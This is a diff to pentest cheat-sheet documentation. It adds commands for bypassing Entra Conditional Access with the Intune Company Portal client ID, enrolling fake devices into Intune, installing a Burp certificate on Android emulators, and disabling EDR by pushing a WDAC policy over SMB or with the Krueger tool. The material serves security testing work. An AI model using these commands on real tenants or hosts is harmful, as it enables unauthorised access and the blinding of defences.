Intune Client ID Bypass + Wireless Debug + Burp Android

docs/active-directory/ad-adds-enumerate.md

@@ -12,6 +12,7 @@ Use the appropriate data collector to gather information for **BloodHound** or *
 * [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
 * [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory  (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel)
 * [c3c/ADExplorerSnapshot.py](https://github.com/c3c/ADExplorerSnapshot.py) - for local Active Directory (Generate BloodHound compatible JSON from AD Explorer snapshot)
+* [CrowdStrike/sccmhound](https://github.com/CrowdStrike/sccmhound) for local Active Directory (C# collector using Microsoft Configuration Manager)
 
 
 **Examples**:

docs/cloud/azure/azure-ad-conditional-access-policy.md

@@ -19,17 +19,33 @@ Conditional Access is used to restrict access to resources to compliant devices
 
 ## Bypassing CAP by faking device compliance
 
+### Intune Company Portal Client ID Bypass
+
+Use Intune Company Portal Client ID (`9ba1a5c7-f17a-4de9-a1f1-6178c8d51223`), to run roadrecon even when there is a device compliance policy. it is a hardcoded and undocumented exclusion in Conditional Access for device compliance and has the `user_impersonation` rights on the AAD Graph.
+
+* Client ID: `9ba1a5c7-f17a-4de9-a1f1-6178c8d51223`
+
+```ps1
+roadtx gettokens -u $username -p $password -r msgraph -ua $windows_ua -c 9ba1a5c7-f17a-4de9-a1f1-6178c8d51223 # limite scope
+roadtx gettokens -u $username -p $password -r aadgraph -ua $windows_ua -c 9ba1a5c7-f17a-4de9-a1f1-6178c8d51223 # user_impersonation scope
+```
+
+### AAD Internals - Making your device compliant
+
 ```powershell
-# AAD Internals - Making your device compliant
 # Get an access token for AAD join and save to cache
 Get-AADIntAccessTokenForAADJoin -SaveToCache
+
 # Join the device to Azure AD
 Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
+
 # Marking device compliant - option 1: Registering device to Intune
 # Get an access token for Intune MDM and save to cache (prompts for credentials)
 Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache 
+
 # Join the device to Intune
 Join-AADIntDeviceToIntune -DeviceName "SixByFour"
+
 # Start the call back
 Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"
 ```

docs/cloud/azure/azure-devices-users-sp.md

@@ -180,7 +180,19 @@ PS> dsregcmd.exe /status
 
 ### Join Devices
 
-* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
+[Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
+
+* [secureworks/pytune](https://github.com/secureworks/pytune) - Pytune is a post-exploitation tool for enrolling a fake device into Intune with mulitple platform support.
+    ```ps1
+    usage: pytune.py [-h] {entra_join,entra_delete,enroll_intune,checkin,retire_intune,check_compliant,download_apps} ...
+
+    python3 pytune.py entra_join -o Windows -d Windows_pytune -u testuser@*******.onmicrosoft.com -p ***********
+    python3 pytune.py enroll_intune -o Windows -d Windows_pytune -c Windows_pytune.pfx -u testuser@*******.onmicrosoft.com -p ***********
+    python3 pytune.py checkin -o Windows -d Windows_pytune -c Windows_pytune.pfx -m Windows_pytune_mdm.pfx -u testuser@*******.onmicrosoft.com -p ***********
+    python3 pytune.py check_compliant -o Windows -c Windows_pytune.pfx -u testuser@*******.onmicrosoft.com -p ***********
+    python3 pytune.py check_compliant -o Windows -c Windows_pytune.pfx -u testuser@*******.onmicrosoft.com -p *********** -H $HWHASH
+    ```
+
 
 
 ### Register Devices
@@ -247,4 +259,5 @@ roadtx findscope -s https://graph.microsoft.com/mail.read
 * [AZURE AD INTRODUCTION FOR RED TEAMERS - Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
 * [Hidden in Plain Sight: Abusing Entra ID Administrative Units for Sticky Persistence - Katie Knowles - September 16, 2024](https://securitylabs.datadoghq.com/articles/abusing-entra-id-administrative-units/)
-* [Create Sticky Backdoor User Through Restricted Management AU - Datadog, Inc](https://stratus-red-team.cloud/attack-techniques/entra-id/entra-id.persistence.restricted-au/)
+* [Create Sticky Backdoor User Through Restricted Management AU - Datadog, Inc](https://stratus-red-team.cloud/attack-techniques/entra-id/entra-id.persistence.restricted-au/)
+* [Unveiling the Power of Intune: Leveraging Intune for Breaking Into Your Cloud and On-Premise - Yuya Chudo - December 11, 2024](https://i.blackhat.com/EU-24/Presentations/EU-24-Chudo-Unveiling-the-Power-of-Intune-Leveraging-Intune-for-Breaking-Into-Your-Cloud-and-On-Premise.pdf)

docs/cloud/azure/azure-services-microsoft-intune.md

@@ -38,11 +38,19 @@ The following scripts are deprecated, use `MgGraph` instead of `MsGraph`, and ch
     ```ps1
     Get-DeviceManagementScripts -FolderPath C:\temp -FileName myScript.ps1
     ```
+
 * [okieselbach/Get-DeviceHealthScripts.ps1](https://raw.githubusercontent.com/okieselbach/Intune/master/Get-DeviceHealthScripts.ps1) - Get all or individual Intune PowerShell Health scripts (aka Proactive Remediation scripts) and save them in specified folder.
     ```ps1
     Get-DeviceHealthScripts -FolderPath C:\temp\HealthScripts
     ```
 
+* [secureworks/pytune](https://github.com/secureworks/pytune) - Pytune is a post-exploitation tool for enrolling a fake device into Intune with mulitple platform support.
+    ```ps1
+    python3 pytune.py entra_join -o Windows -d Windows_pytune -u testuser@*******.onmicrosoft.com -p ***********  
+    python3 pytune.py enroll_intune -o Windows -d Windows_pytune -c Windows_pytune.pfx -u testuser@*******.onmicrosoft.com -p *********** 
+    python3 pytune.py download_apps -d Windows_pytune -m Windows_pytune_mdm.pfx
+    ```
+
 
 ## LAPS
 

docs/methodology/android-applications.md

@@ -173,6 +173,26 @@ Dynamic analysis for Android malware involves executing and monitoring an app in
 * Click Install certificates from SD card
 * Configure the AVD to use the proxy
 
+```ps1
+# Convert Burp certificate for Android
+openssl x509 -inform DER -in burp.der -out burp.pem
+openssl x509 -inform PEM -subject_hash_old -in burp.pem |head -1
+mv burp.pem <hash output>.0
+
+# Push the certificate in the AVD
+emulator -list-avds
+emulator -avd Pentesting_Device -writable-system
+adb root
+adb remount
+adb push <hash>.0 /sdcard/
+
+# Change the permissions
+adb shell
+mv /sdcard/<hash>.0 /system/etc/security/cacerts/
+chmod 644 /system/etc/security/cacerts/<hash>.0
+chown root:root /system/etc/security/cacerts/<hash>.0
+```
+
 
 ### Frida
 
@@ -417,6 +437,38 @@ Common bypass:
 
 Android Debug Bridge (ADB) is a versatile command-line tool that enables communication between a computer and an Android device. It facilitates tasks like installing apps, debugging, accessing the device's shell, and transferring files, making it essential for developers and power users in Android development and troubleshooting.
 
+### USB Debugging
+
+* Open the **Settings** app.
+* Select **System**.
+* Scroll to the bottom and select **About phone**.
+* Scroll to the bottom and tap **Build number** 7 times.
+* Return to the previous screen to find **Developer options** near the bottom.
+* Scroll down and enable **USB debugging**.
+
+```ps1
+./platform-tools/adb connect IP:PORT
+./platform-tools/adb shell
+```
+
+### Wireless Debugging
+
+* Open the **Settings** app.
+* Select **System**.
+* Scroll to the bottom and select **About phone**.
+* Scroll to the bottom and tap **Build number** 7 times.
+* Return to the previous screen to find **Developer options** near the bottom.
+* Scroll down and enable **Wifi debugging**.
+* Click on **Wifi debugging** to access the settings
+
+One more step, you need to pair the devices using a code.
+
+```ps1
+./platform-tools/adb pair IP:PORT CODE
+./platform-tools/adb connect IP:PORT
+./platform-tools/adb shell
+```
+
 | Command                      | Description                                    |
 |------------------------------|------------------------------------------------|
 | `adb devices`                | List devices                                   |
@@ -490,4 +542,5 @@ Unlock the bootloader will wipe the userdata partition. On some device these met
 * [Introduction to Android Pentesting - Jarrod - July 8, 2024](https://owlhacku.com/introduction-to-android-pentesting/)
 * [A beginners guide to using Frida to bypass root detection. - DianaOpanga - Nov 27, 2023](https://medium.com/@dianaopanga/a-beginners-guide-to-using-frida-to-bypass-root-detection-16af76b989ac)
 * [Appium documentation](https://appium.io/docs/en/latest/)
-* [How to root an Android device for analysis and vulnerability assessment - Joe Lovett - 23 Aug 2024](https://www.pentestpartners.com/security-blog/how-to-root-an-android-device-for-analysis-and-vulnerability-assessment/)
+* [How to root an Android device for analysis and vulnerability assessment - Joe Lovett - Aug 23, 2024](https://www.pentestpartners.com/security-blog/how-to-root-an-android-device-for-analysis-and-vulnerability-assessment/)
+* [Configuring Android Emulator with Burp Suite - Jarrod @Jrod_R87 - Jan 8, 2025](https://owlhacku.com/configuring-android-emulator-with-burp-suite/)

docs/redteam/evasion/edr-bypass.md

@@ -65,8 +65,26 @@ Endpoint Detection and Response (EDR) is a security solution that combines real-
 - TODO
 
 
+## WDAC to Disable EDR Components
+
+Place the WDAC policy `SiPolicy.p7b` inside `C:\Windows\System32\CodeIntegrity\` and reboot the machine.
+
+```ps1
+smbmap -u Administrator -p P@ssw0rd -H 192.168.4.4 --upload "/home/kali/SiPolicy.p7b" "ADMIN\$/System32/CodeIntegrity/SiPolicy.p7b"
+smbmap -u Administrator -p P@ssw0rd -H 192.168.4.4 -x "shutdown /r /t 0"
+```
+
+Using Krueger a .NET post-exploitation tool.
+
+* [logangoins/Krueger](https://github.com/logangoins/Krueger) - Proof of Concept (PoC) .NET tool for remotely killing EDR with WDAC
+    ```ps1
+    inlineExecute-Assembly --dotnetassembly C:\Tools\Krueger.exe --assemblyargs --host ms01
+    ```
+
+
 ## References
 
 * [Flying Under the Radar: Part 1: Resolving Sensitive Windows Functions with x64 Assembly - theepicpowner - Apr 24, 2024](https://theepicpowner.gitlab.io/posts/Flying-Under-the-Radar-Part-1/)
 * [Malware AV/VM evasion - part 16: WinAPI GetProcAddress implementation. Simple C++ example - cocomelonc](https://cocomelonc.github.io/malware/2023/04/16/malware-av-evasion-16.html)
-* [Custom GetProcAddress And GetModuleHandle Implementation (X64) - daax - December 15, 2016](https://revers.engineering/custom-getprocaddress-and-getmodulehandle-implementation-x64/)
+* [Custom GetProcAddress And GetModuleHandle Implementation (X64) - daax - December 15, 2016](https://revers.engineering/custom-getprocaddress-and-getmodulehandle-implementation-x64/)
+* [Weaponizing WDAC: Killing the Dreams of EDR - Jonathan Beierle and Logan Goins - December 20, 2024](https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/)

docs/redteam/evasion/windows-defenses.md

@@ -407,10 +407,12 @@ Also known as `WDAC/UMCI/Device Guard`.
     DeviceGuardCodeIntegrityPolicyEnforcementStatus         : EnforcementMode
     DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus : EnforcementMode
     ```
+
 * Remove WDAC policies using CiTool.exe (Windows 11 2022 Update)
     ```ps1
     $ CiTool.exe -rp "{PolicyId GUID}" -json
     ```
+    
 * Device Guard policy location: `C:\Windows\System32\CodeIntegrity\CiPolicies\Active\{PolicyId GUID}.cip`
 * Device Guard example policies: `C:\Windows\System32\CodeIntegrity\ExamplePolicies\`
 * WDAC utilities: [mattifestation/WDACTools](https://github.com/mattifestation/WDACTools), a PowerShell module to facilitate building, configuring, deploying, and auditing Windows Defender Application Control (WDAC) policies